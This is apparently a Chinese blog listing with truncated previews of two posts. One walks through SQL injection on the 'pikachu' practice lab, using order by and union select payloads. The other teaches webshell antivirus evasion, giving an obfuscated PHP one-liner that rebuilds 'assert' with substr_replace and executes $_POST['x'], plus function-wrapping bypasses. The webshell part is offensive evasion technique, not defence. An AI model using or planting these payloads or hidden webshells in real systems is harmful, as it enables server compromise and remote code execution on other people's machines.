- 博客(2)
- 收藏
- 关注
RSS订阅原创 pikachu字符型注入
1.字符型注入吧。直接就 1' 报错了 2.存在字符型注入 3. 1' order by 1# 和 1' order by 2# 返回正常 3时报错。这样就知道了,字段数为2,两列数据 4. 确定一下字段的显示位置嘛。 1' union select 1,2# 5.查一下数据库名 1' union select database(),version()# /**数据库名和版本**/ 只有数据库5.0以上的版本,才会存在i...
2021-11-09 20:31:35
1953
原创 叫什么免杀
ucwords() //函数把字符串中每个单词的首字符转换为大写。 ucfirst() //函数把字符串中的首字符转换为大写。 trim() //函数从字符串的两端删除空白字符和其他预定义字符。 strtolower() //函数把字符串转换为小写。 strtok() //函数把字符串分割为更小的字符串 1、函数变形,达到免杀效果 <?php $a = substr_replace("assexx","rt",4); $a($_POST['x']);?> 2、定义函数绕过 定义一个函数把关.
2021-11-04 15:12:37
128
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人